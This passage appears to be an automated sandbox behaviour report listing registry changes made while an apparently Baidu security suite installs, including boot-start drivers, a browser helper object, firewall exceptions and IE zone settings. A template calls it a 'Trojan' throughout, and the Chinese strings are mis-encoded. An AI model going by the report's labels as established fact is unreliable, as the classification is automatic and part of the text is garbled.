"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\BDMSkin.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\GetSupplyId.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\KVInstallHelper.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll.bak, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667.bak\bd0001.dll.bak, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667.bak, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch.bak,"
[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_hips" = "%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733"
[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"
"Description" = "bd0001"
[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"
[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"
The process BaiduHips.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"
"ImagePath" = "system32\DRIVERS\bd0002.sys"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"
[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"
[HKLM\System\CurrentControlSet\Services\bd0002]
"ErrorControl" = "0"
"Group" = "bddriver"
"Tag" = "2"
[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 7D C4 47 59 87 2A C6 05 E4 0D B5 7F 25 59 F1"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"
"DisplayName" = "bd0001"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch.bak,"
[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_hips" = "%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667"
[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"
"Description" = "bd0001"
[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"
[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"
The process netsh.exe:2640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 72 13 D7 06 EE E8 C2 D0 2D B5 67 8E 4D 1F 9F"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
The process BDKVWsc.exe:2568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 37 9A 77 FC C6 44 F3 68 DC 3E 1B 06 35 45 E9"
The process BDKVWsc.exe:2668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 AE 50 42 A3 70 E8 26 C1 C6 48 F7 FF EB 58 B6"
The process RegSvr32.exe:2972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\BDSWShellExt.BDSWShellExtMenu]
"(Default)" = "BDSWShellExtMenu Class"
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\TypeLib]
"(Default)" = "{70891BDB-3BE3-45A9-96B6-184ABA962091}"
[HKCR\CLSID\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}]
"(Default)" = "PSFactoryBuffer"
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
"AppID" = "{A8B81847-1462-4756-9D4A-F506BC5361CD}"
[HKCR\BDSWShellExt.BDSWShellExtMenu\CLSID]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"
[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\NumMethods]
"(Default)" = "3"
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\ProgID]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu.1"
[HKCR\CLSID\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\InProcServer32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"
"ThreadingModel" = "Both"
[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}]
"(Default)" = "IBDSWShellExtMenu"
[HKCR\BDSWShellExt.BDSWShellExtMenu.1\CLSID]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"
[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\ProxyStubClsid32]
"(Default)" = "{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}"
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
"(Default)" = "BDSWShellExtMenu Class"
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\AppID\{A8B81847-1462-4756-9D4A-F506BC5361CD}]
"(Default)" = "BDSWShellExt"
[HKCR\*\shellex\ContextMenuHandlers\ABDSWShellExt]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"
[HKCR\AppID\BDSWShellExt.DLL]
"AppID" = "{A8B81847-1462-4756-9D4A-F506BC5361CD}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{11292110-6F8D-4D56-863C-44902A1E7880}" = "BDSWShellExtMenu Class"
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"
[HKCR\BDSWShellExt.BDSWShellExtMenu\CurVer]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu.1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 23 D2 B7 0B A2 95 DF D8 A6 EC 31 04 76 F7 CC"
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\VersionIndependentProgID]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu"
[HKCR\BDSWShellExt.BDSWShellExtMenu.1]
"(Default)" = "BDSWShellExtMenu Class"
The Trojan deletes the following registry key(s):
[HKCR\*\shellex\ContextMenuHandlers\ABDSWShellExt]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\ProgID]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\VersionIndependentProgID]
[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\TypeLib]
The process RegSvr32.exe:2256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 89 F1 0E 50 4A 3B 2A D0 B2 79 71 13 07 B0 D3"
[HKCR\BDShellExt.BDShellExtMenu\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"
[HKCR\BDShellExt.BDShellExtMenu\CurVer]
"(Default)" = "BDShellExt.BDShellExtMenu.1"
[HKCR\BDShellExt.BDShellExtMenu.1]
"(Default)" = "BDShellExtMenu Class"
[HKCR\BDShellExt.BDShellExtMenu]
"(Default)" = "BDShellExtMenu Class"
[HKCR\BDShellExt.BDShellExtMenu.1\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"
[HKCR\AppID\{FBE0E29B-01DB-4876-B147-46F5AABA6823}]
"(Default)" = "BDShellExt"
[HKCR\AppID\BDShellExt.DLL]
"AppID" = "{FBE0E29B-01DB-4876-B147-46F5AABA6823}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{00890530-6A9F-4be2-B1BB-73F01E2BB986}" = "BDShellExtMenu Class"
The Trojan deletes the following registry key(s):
[HKCR\BDShellExt.BDShellExtMenu\CurVer]
[HKCR\BDShellExt.BDShellExtMenu.1\CLSID]
[HKCR\BDShellExt.BDShellExtMenu\CLSID]
[HKCR\BDShellExt.BDShellExtMenu.1]
[HKCR\BDShellExt.BDShellExtMenu]
The process RegSvr32.exe:560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B A1 F1 EA EE 82 77 1D 8D B5 4E 15 5A 33 DE 86"
The process RegSvr32.exe:1232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 12 A1 17 A9 F2 C4 64 BE E6 3E 7E D4 BE 4E 12"
[HKCR\CLSID\{15DEE173-1BE9-4424-81E0-58A87076E9B1}\InprocServer32]
"ThreadingModel" = "Apartment"
"(Default)" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll"
[HKCR\CLSID\{15DEE173-1BE9-4424-81E0-58A87076E9B1}]
"(Default)" = "WebMonBHO"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{15DEE173-1BE9-4424-81E0-58A87076E9B1}]
"(Default)" = "BDHOOK"
"NoExplorer" = "1"
The process RegSvr32.exe:2360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 B8 20 6B DD 9F A6 F1 02 82 5F A1 FE 62 CB 74"
The process bddownloader.exe:2600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\0\win32]
"(Default)" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe"
[HKCR\BDDownloadProxy.Downloader\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\LocalServer32]
"(Default)" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\BDDownloadProxy.Downloader.1]
"(Default)" = "Downloader Class"
[HKCR\BDDownloadProxy.Downloader.1\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\BDDownloadProxy.Downloader]
"(Default)" = "Downloader Class"
[HKCR\AppID\{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}]
"(Default)" = "DownloadProxy"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"(Default)" = "Downloader Class"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\ProgID]
"(Default)" = "BDDownloadProxy.Downloader.1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"Version" = "1.0"
[HKCR\AppID\DownloadProxy.EXE]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\HELPDIR]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 C1 3B D2 F1 8A 62 48 76 B9 52 FC 65 A4 46 F0"
[HKCR\BDDownloadProxy.Downloader\CurVer]
"(Default)" = "BDDownloadProxy.Downloader.1"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}]
"(Default)" = "_IDownloaderEvents"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0]
"(Default)" = "DownloadProxy 1.0 Type Library"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\VersionIndependentProgID]
"(Default)" = "BDDownloadProxy.Downloader"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process bddownloader.exe:3300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 C2 BA 26 D0 8C B5 7E E3 0E 4A 70 10 7C C3 3B"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\metnsd\clsid]
"SequenceID" = "59 02 BF 88 AE 5C DF 4E 8B F2 61 7C 4A 3A BB 8F"
The process bddownloader.exe:3792 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 0F A4 74 3D 75 74 94 70 CF 34 78 ED 14 97 FE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process G1023_s_70904.exe:3576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度å«士]
"Publisher" = "百度在线网络技术(åŒâ€â€ÃƒÂ¤Ã‚ºÂ¬Ã¯Â¼â€°Ã¦Å“䎪ÂÂå…¬å¸"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度å«士]
"DisplayVersion" = "3.0.0.3971"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\bd0003]
"Description" = "百度æÂ€毒功能组件"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度å«士]
"DisplayIcon" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\app.ico"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"InstallDate" = "2014-11-6"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Tag" = "2"
[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Altitude" = "326912"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Tag" = "4"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\BDMSkin.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\GetSupplyId.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\KVInstallHelper.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk3.tmp\, , \??\%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll.bak,"
[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_hips" = "%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733"
[HKCR\Unknown\shell\openas\command]
"DelegateExecute" = ""
[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"
[HKLM\System\CurrentControlSet\Services\bd0003]
"Group" = "FSFilter Anti-Virus"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Description" = "BDArKit"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts]
"Baiduan Number(TrueType)" = "baiduan_number_new.ttf"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"VirusTime" = "2013.04.05 1216"
[HKLM\SOFTWARE\Baidu\BaiduHips]
"Version" = "1.1.0.733"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"
[HKCR\Unknown\shell\openas\command]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDAFileHelper.exe -file=%1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\System\CurrentControlSet\Services\bd0003\Instances]
"DefaultInstance" = "bd0003 Instance"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"INSTLANG" = "2052"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"Version" = "3.0.0.3971"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 9D AC BF FD 8A 85 33 78 FA 65 C6 21 1A 46 70"
[HKLM\System\CurrentControlSet\Services\bd0001]
"DisplayName" = "bd0001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\bd0003]
"DependOnService" = "FltMgr"
[HKLM\System\CurrentControlSet\Services\BDKVRTP]
"Group" = "bdsvcorder"
[HKLM\System\CurrentControlSet\Services\BaiduHips]
"Tag" = "1"
[HKLM\SOFTWARE\Baidu\BaiduHips]
"InstallPath" = "%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHips.exe"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Group" = "bddriver"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度å«士]
"UninstallString" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\uninst.exe"
[HKLM\System\CurrentControlSet\Services\BaiduHips]
"Group" = "bdsvcorder"
[HKLM\System\CurrentControlSet\Services\bd0003]
"ImagePath" = "system32\DRIVERS\bd0003.sys"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bdsvcorder" = "04 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"RtpFlag" = "273"
[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"
[HKLM\System\CurrentControlSet\Services\bd0003]
"Type" = "2"
[HKLM\System\CurrentControlSet\Services\bd0002]
"ErrorControl" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Group" = "bddriver"
[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"
[HKLM\System\CurrentControlSet\Services\bd0003]
"Tag" = "3"
[HKLM\System\CurrentControlSet\Services\BDKVRTP]
"Tag" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"
[HKLM\SOFTWARE\Baidu\BaiduHips]
"InstallDir" = "%Program Files%\Common Files\Baidu\BaiduHips"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Type" = "1"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"SupplyID" = "70904"
"InstallDir" = "%Program Files%\Baidu\BaiduAn"
[HKLM\System\CurrentControlSet\Services\bd0003]
"ErrorControl" = "1"
[HKLM\System\CurrentControlSet\Services\bd0002]
"ImagePath" = "system32\DRIVERS\bd0002.sys"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度å«士]
"DisplayName" = "百度å«士3.0"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\System\CurrentControlSet\Services\bd0003\Instances\bd0003 Instance]
"Flags" = "0"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"DisplayName" = "BDArKit"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"
"Description" = "bd0001"
[HKLM\System\CurrentControlSet\Services\bd0003]
"DisplayName" = "bd0003"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAnBugRpt.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnBugRpt.exe:*:Enabled:百度å«士BUG上报程åºÂÂ"
"BaiduAnTray.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnTray.exe:*:Enabled:百度å«士托盘程åºÂÂ"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\bd0003]
"Start" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAn.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAn.exe:*:Enabled:百度å«士主程åºÂÂ"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduAn\3.0.0.3971]
"BaiduAnUpdate.exe" = "%Program Files%\baidu\BaiduAn\3.0.0.3971\BaiduAnUpdate.exe:*:Enabled:百度å«士更新程åºÂÂ"
Adds a rule to the firewall Windows which allows any network activity:
